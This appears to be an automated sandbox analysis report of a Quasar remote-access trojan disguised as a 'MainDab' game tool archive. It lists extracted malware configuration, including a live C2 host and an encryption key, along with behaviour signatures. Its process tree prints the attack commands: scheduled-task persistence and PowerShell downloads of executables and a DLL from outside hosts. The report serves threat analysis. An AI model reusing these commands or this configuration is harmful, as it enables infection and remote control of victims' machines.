Analysis
- max time kernel: 112s
- max time network: 109s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 03-06-2024 09:38
- Static task: static1
- URLScan task: urlscan1
General
Malware Config
Extracted
- Family: quasar
- Version: 1.4.0.0
- Botnet: Office
- C2: espinyskibidi-40205.portmap.host:40205
- Mutex: CdrjrrWbtRopP1ic7E
- encryption_key: P2ctPN6uGReD4W1dEypm
- install_name: Client.exe
- log_directory: Logs
- reconnect_delay: 3000
- startup_key: Client
- subdirectory: Microsoft
Signatures
-
Quasar payload 2 IoCs
Processes:
- resource C:\Users\Admin\Downloads\Loader.exe, yara_rule family_quasar
- resource behavioral1/memory/5880-99-0x00000000006C0000-0x000000000070E000-memory.dmp, yara_rule family_quasar
-
Blocklisted process makes network request 3 IoCs
Processes:
- flow 70, pid 1356 powershell.exe
- flow 72, pid 1356 powershell.exe
- flow 96, pid 6092 powershell.exe
-
Command and Scripting Interpreter: PowerShell
Processes:
- pid 1356 powershell.exe
- pid 6092 powershell.exe
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
- Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation, process MainDab.exe
-
Executes dropped EXE 4 IoCs
Processes:
- pid 5880 Loader.exe
- pid 6120 Client.exe
- pid 5380 Loader.exe
- pid 5744 MainDab.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
- flow 71, ioc raw.githubusercontent.com
- flow 72, ioc raw.githubusercontent.com
- flow 88, ioc raw.githubusercontent.com
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 62, ioc ip-api.com
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
- pid 6076 schtasks.exe
- pid 388 schtasks.exe
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS, process msedge.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer, process msedge.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName, process msedge.exe
-
Modifies registry class 1 IoCs
Processes:
- Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings, process msedge.exe
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
- pid 3984 msedge.exe (2 events)
- pid 2528 msedge.exe (2 events)
- pid 4308 identity_helper.exe (2 events)
- pid 960 msedge.exe (2 events)
- pid 1356 powershell.exe (3 events)
- pid 6092 powershell.exe (3 events)
- pid 5744 MainDab.exe (10 events)
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
- pid 2528 msedge.exe (7 events)
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
- Token: SeRestorePrivilege, pid 5540 7zG.exe
- Token: 35, pid 5540 7zG.exe
- Token: SeSecurityPrivilege, pid 5540 7zG.exe
- Token: SeSecurityPrivilege, pid 5540 7zG.exe
- Token: SeDebugPrivilege, pid 5880 Loader.exe
- Token: SeDebugPrivilege, pid 6120 Client.exe
- Token: SeDebugPrivilege, pid 1356 powershell.exe
- Token: SeDebugPrivilege, pid 5744 MainDab.exe
- Token: SeDebugPrivilege, pid 6092 powershell.exe
-
Suspicious use of FindShellTrayWindow 34 IoCs
Processes:
- pid 2528 msedge.exe (33 events)
- pid 5540 7zG.exe (1 event)
-
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
- pid 2528 msedge.exe (24 events)
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
- pid 5744 MainDab.exe (2 events)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
- PID 2528 msedge.exe wrote to the memory of its child msedge.exe processes with PIDs 208, 1820, 3984 and 1264 (64 events in total)
Processes
Process tree (the bracketed number is the nesting depth of the process in the tree):
- [1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/cfedss/xMainDab/releases/download/101/xMainDab.rar
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe902246f8,0x7ffe90224708,0x7ffe90224718
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:3
  - Suspicious behavior: EnumeratesProcesses
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4728 /prefetch:8
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
- [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16413134349926192874,2864111651329480774,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
- [1] C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
- [1] C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
- [1] C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- [1] C:\Program Files\7-Zip\7zG.exe
  Command line: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap9114:78:7zEvent14397
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
- [1] C:\Users\Admin\Downloads\Loader.exe
  Command line: "C:\Users\Admin\Downloads\Loader.exe"
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- [2] C:\Windows\SysWOW64\schtasks.exe
  Command line: "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\Downloads\Loader.exe" /rl HIGHEST /f
  - Creates scheduled task(s)
- [2] C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
  Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- [3] C:\Windows\SysWOW64\schtasks.exe
  Command line: "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
  - Creates scheduled task(s)
- [1] C:\Windows\System32\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Install.cmd"
- [2] C:\Users\Admin\Downloads\Loader.exe
  Command line: "\Users\Admin\Downloads\Loader.exe"
  - Executes dropped EXE
- [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -C ""Invoke-WebRequest -Uri 'https://github.com/Espiny/test/raw/main/MainDab.exe' -OutFile '\Users\Admin\Downloads\MainDab.exe'""
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [1] C:\Users\Admin\Downloads\MainDab.exe
  Command line: "C:\Users\Admin\Downloads\MainDab.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
- [2] C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /C powershell -c Invoke-WebRequest -Uri 'https://k-storage.com/bootstrapper/files/krnl.dll' -OutFile 'C:\Users\Admin\Downloads\krnl.dll'
- [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -c Invoke-WebRequest -Uri 'https://k-storage.com/bootstrapper/files/krnl.dll' -OutFile 'C:\Users\Admin\Downloads\krnl.dll'
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\SysWOW64\werfault.exe
  Command line: werfault.exe /h /shared Global\89f113f47ef541c4bddde32eaf69b391 /t 5752 /p 5744
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Loader.exe.log (1KB)
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\6c232867-95b2-433e-9e37-a50130977164.tmp (11KB)
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat (152B)
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat (152B)
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State (265B)
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (5KB)
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (6KB)
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT (16B)
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State (11KB)
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (1KB)
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ajw53az.nhn.ps1 (60B)
- C:\Users\Admin\Downloads\Install.cmd (407B)
- C:\Users\Admin\Downloads\Loader.exe (286KB)
- C:\Users\Admin\Downloads\MainDab.exe (3.4MB)
- C:\Users\Admin\Downloads\xMainDab.rar (110KB)
- \??\pipe\LOCAL\crashpad_2528_GDHDCMYDBFNAACLJ
- memory/1356-115-0x000002189D5A0000-0x000002189D5C2000-memory.dmp (136KB)
- memory/5744-175-0x0000000007EB0000-0x0000000007ECA000-memory.dmp (104KB)
- memory/5744-169-0x0000000006C10000-0x0000000006C1E000-memory.dmp (56KB)
- memory/5744-184-0x000000000F3E0000-0x000000000F430000-memory.dmp (320KB)
- memory/5744-174-0x0000000007BE0000-0x0000000007BFE000-memory.dmp (120KB)
- memory/5744-173-0x000000000C5A0000-0x000000000C616000-memory.dmp (472KB)
- memory/5744-168-0x0000000006C40000-0x0000000006C78000-memory.dmp (224KB)
- memory/5744-161-0x0000000000DC0000-0x0000000001136000-memory.dmp (3.5MB)
- memory/5744-162-0x0000000005880000-0x0000000005888000-memory.dmp (32KB)
- memory/5744-163-0x0000000005B50000-0x0000000005BEE000-memory.dmp (632KB)
- memory/5744-165-0x0000000007880000-0x000000000792A000-memory.dmp (680KB)
- memory/5744-166-0x00000000079A0000-0x00000000079C2000-memory.dmp (136KB)
- memory/5744-167-0x0000000006BF0000-0x0000000006BF8000-memory.dmp (32KB)
- memory/5880-101-0x00000000050D0000-0x0000000005162000-memory.dmp (584KB)
- memory/5880-99-0x00000000006C0000-0x000000000070E000-memory.dmp (312KB)
- memory/5880-102-0x0000000005180000-0x00000000051E6000-memory.dmp (408KB)
- memory/5880-103-0x0000000005DE0000-0x0000000005DF2000-memory.dmp (72KB)
- memory/5880-100-0x0000000005730000-0x0000000005CD4000-memory.dmp (5.6MB)
- memory/5880-104-0x0000000006360000-0x000000000639C000-memory.dmp (240KB)
- memory/6092-183-0x0000000005160000-0x0000000005788000-memory.dmp (6.2MB)
- memory/6092-185-0x00000000058A0000-0x0000000005906000-memory.dmp (408KB)
- memory/6092-179-0x0000000002990000-0x00000000029C6000-memory.dmp (216KB)
- memory/6092-195-0x0000000005980000-0x0000000005CD4000-memory.dmp (3.3MB)
- memory/6092-197-0x0000000005F80000-0x0000000005F9E000-memory.dmp (120KB)
- memory/6092-198-0x0000000005FB0000-0x0000000005FFC000-memory.dmp (304KB)
- memory/6092-199-0x00000000077C0000-0x0000000007E3A000-memory.dmp (6.5MB)
- memory/6092-200-0x0000000006470000-0x000000000648A000-memory.dmp (104KB)
- memory/6120-111-0x0000000006900000-0x000000000690A000-memory.dmp (40KB)